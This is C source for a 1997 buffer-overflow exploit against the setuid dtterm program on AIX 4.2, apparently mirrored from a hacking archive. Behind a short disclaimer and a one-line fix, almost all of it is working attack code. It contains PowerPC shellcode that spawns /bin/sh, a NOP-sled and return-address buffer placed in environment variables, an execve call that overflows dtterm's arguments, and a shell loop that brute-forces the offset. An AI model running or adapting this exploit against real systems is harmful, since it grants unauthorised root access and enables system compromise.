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- /*
- AIX 4.2,(others?) dtterm exploit by Georgi Guninski
- ----------------------------------------
- This program is for educational purpose ONLY. Do not use it without
- permission.
- The usual standard disclaimer applies, especially the fact that Georgi
- Guninski
- is not liable for any damages caused by direct or indirect use of
- the information or functionality provided by this program.
- Georgi Guninski, his employer or any Internet provider bears NO
- responsibility for content
- or misuse of this program or any derivatives thereof.
- By using this program you accept the fact that any damage (dataloss,
- system
- crash, system compromise, etc.) caused by the use of this program is not
- Georgi Guninski's responsibility.
- In case you distribute this, please keep the disclaimer and my addresses.
- -----------------------------------------
- Use the IBM C compiler.
- Compile with: cc -g aixdtterm.c
- Some brute forcing may help.
- DISPLAY should be set to a valid display.
- SOLUTION: #chmod -s /usr/dt/bin/dtterm ; dtterm seems to continue
- working?
- -----------------
- Georgi Guninski
- guninski@hotmail.com
- sgg@vmei.acad.bg
- guninski@linux2.vmei.acad.bg
- Suggestions,comments and job offers are welcome!
- 20-MAY-97
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- char prog[100]="/usr/dt/bin/dtterm";
- char prog2[30]="dtterm";
- extern int execv();
- char *createvar(char *name,char *value)
- {
- char *c;
- int l;
- l=strlen(name)+strlen(value)+4;
- if (! (c=malloc(l)))
- {
- perror("error allocating");
- exit(2);
- };
- strcpy(c,name);
- strcat(c,"=");
- strcat(c,value);
- putenv(c);
- return c;
- }
- /*The program*/
- main(int argc,char **argv,char **env)
- {
- /*The code*/
- unsigned int code[]={
- 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
- 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
- 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
- 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
- 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
- 0x7c0903a6 , 0x4e800420, 0x0
- };
- /* disassembly
- 7c0802a6 mfspr r0,LR
- 9421fbb0 stu SP,-1104(SP) --get stack
- 90010458 st r0,1112(SP)
- 3c60f019 cau r3,r0,0xf019 --CTR
- 60632c48 lis r3,r3,11336 --CTR
- 90610440 st r3,1088(SP)
- 3c60d002 cau r3,r0,0xd002 --TOC
- 60634c0c lis r3,r3,19468 --TOC
- 90610444 st r3,1092(SP)
- 3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
- 6063696e lis r3,r3,26990
- 90610438 st r3,1080(SP)
- 3c602f73 cau r3,r0,0x2f73
- 60636801 lis r3,r3,26625
- 3863ffff addi r3,r3,-1
- 9061043c st r3,1084(SP) --terminate with 0
- 30610438 lis r3,SP,1080
- 7c842278 xor r4,r4,r4 --argv=NULL
- 80410440 lwz RTOC,1088(SP)
- 80010444 lwz r0,1092(SP) --jump
- 7c0903a6 mtspr CTR,r0
- 4e800420 bctr --jump
- */
- #define MAXBUF 600
- unsigned int buf[MAXBUF];
- unsigned int frame[MAXBUF];
- unsigned int i,nop,mn;
- int max;
- int QUIET=0;
- int dobuf=0;
- unsigned int toc;
- unsigned int eco;
- unsigned int *pt;
- char *t;
- int ch;
- unsigned int reta; /* return address */
- int corr=1000;
- char *args[4];
- char *arg1="-ms";
- char *newenv[8];
- int startwith=0;
- mn=200;
- max=300;
- if (argc>1)
- corr = atoi(argv[1]);
- pt=(unsigned *) &execv;
- toc=*(pt+1);
- eco=*pt;
- if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
- {
- perror("Bad parameters");
- exit(1);
- }
- #define OO 7
- *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
- *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
- *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
- *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
- 0x0000ffff);
- reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
- for(nop=0;nop<mn;nop++)
- buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
- strcpy((char*)&buf[nop],(char*)&code);
- i=nop+strlen( (char*) &code)/4-1;
- if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
- || !(reta && 0xff000000))
- {
- perror("Return address has zero");
- exit(5);
- }
- while(i++<max)
- buf[i]=reta;
- buf[i]=0;
- for(i=0;i<max-1;i++)
- frame[i]=reta;
- frame[i]=0;
- if(QUIET)
- {
- puts((char*)&buf);
- fflush(stdout);
- exit(0);
- };
- /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
- newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
- newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
- newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
- newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
- newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
- newenv[5]=NULL;
- args[0]=prog2;
- args[1]=arg1;
- args[2]=(char*)&frame[0]; /* Just frame pointers */
- puts("Start...");/*Here we go*/
- execve(prog,args,newenv);
- perror("Error executing execve \n");
- }
- /*
- -------sometimes this helps-----------------------
- #!/bin/ksh
- L=20
- O=40
- while [ $L -lt 12000 ]
- do
- echo $L
- L=`expr $L + 144`
- ./a.out $L
- done
- */
- /* www.hack.co.za [2000]*/